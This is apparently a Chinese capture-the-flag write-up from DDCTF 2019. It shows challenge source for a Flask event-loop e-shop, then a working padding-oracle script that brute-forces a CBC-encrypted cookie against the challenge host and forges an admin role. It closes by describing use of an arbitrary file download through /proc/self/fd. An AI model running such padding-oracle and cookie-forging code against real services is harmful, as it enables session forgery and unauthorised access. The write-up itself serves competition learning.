defview_handler(args): page = args[0] html = '' html += '[INFO] you have {} diamonds, {} points now.<br />'.format(session['num_items'], session['points']) if page == 'index': html += '<a href="./?action:index;True%23False">View source code</a><br />' html += '<a href="./?action:view;shop">Go to e-shop</a><br />' html += '<a href="./?action:view;reset">Reset</a><br />' elif page == 'shop': html += '<a href="./?action:buy;1">Buy a diamond (1 point)</a><br />' elif page == 'reset': del session['num_items'] html += 'Session reset.<br />' html += '<a href="./?action:view;index">Go back to index.html</a><br />' return html
source = open('eventLoop.py', 'r') html = '' if bool_download_source != 'True': html += '<a href="./?action:index;True%23True">Download this .py file</a><br />' html += '<a href="./?action:view;index">Go back to index.html</a><br />'
for line in source: if bool_download_source != 'True': html += line.replace('&','&').replace('\t', ' '*4).replace(' ',' ').replace('<', '<').replace('>','>').replace('\n', '<br />') else: html += line source.close()
defshow_flag_function(args): flag = args[0] #return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it. return'You naughty boy! ;) <br />'
defget_flag_handler(args): if session['num_items'] >= 5: trigger_event('func:show_flag;' + FLAG()) # show_flag_function has been disabled, no worries trigger_event('action:view;index')
if __name__ == '__main__': app.run(debug=False, host='0.0.0.0')
getflag 的方法很明确,就是弄到五颗以上钻石,然后调用 get_flag_handler ,最后再解码 cookie 就能拿到 flag 了。
url = "http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/api/account_info" data = base64.b64decode("UGFkT3JhY2xlOml2L2NiY8O+7uQmXKFqNVUuI9c7VBe42FqRvernmQhsxyPnvxaF") # iv = data[:16] # c = data[16:32]
IV = "" i_need = '{"id":100,"roleA' for x inrange(16): IV += chr(ord(c_final11[x]) ^ ord(i_need[x])) c = "" i_need = 'dmin":true}' + 5 * "\x05" for x inrange(16): c += chr(ord(c_final2[x]) ^ ord(i_need[x])) print base64.b64encode(IV + c + data[32:])
exit(1)
# Padding Oracle for x in xrange(1, 17): for y in xrange(0, 256): IV = "\x00" * (16 - x) + chr(y) + "".join(chr(ord(i) ^ x) for i in c_final11) payload = base64.b64encode(IV + c) headers = { "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "keep-alive", "Cookie": "token=" + payload, "Host": "c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023", "Referer": "http://c1n0h7ku1yw24husxkxxgn3pcbqu56zj.ddctf2019.com:5023/home", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36""" } result = myd.get(url, headers=headers).content if"decrypt err"notin result: c_final11 = chr(y ^ x) + c_final11 print"[+]Get: " + urllib.quote(c_final11) break if y == 255: print"[!]Error!" exit(1) print urllib.quote(c_final11) # for x in xrange(16): # m += chr(ord(c_final11[x]) ^ ord(iv[x])) # print m # print urllib.quote(m)
exit(1)
修改 cookie ,成为 admin 后看到一个下载链接,这里有一个任意文件下载漏洞。
文件读取
下载到一个 1.txt ,提示说:
1 2 3 4
Tryto hack~ Hint: 1. Env: Springboot + JDK8(openjdk version "1.8.0_181") + Docker~ 2. You can notexec commands~
坑,利用文件读取漏洞,跑字典可以在 /proc/self/fd/15 处下载到一个 zip ,里面就是题目的源码。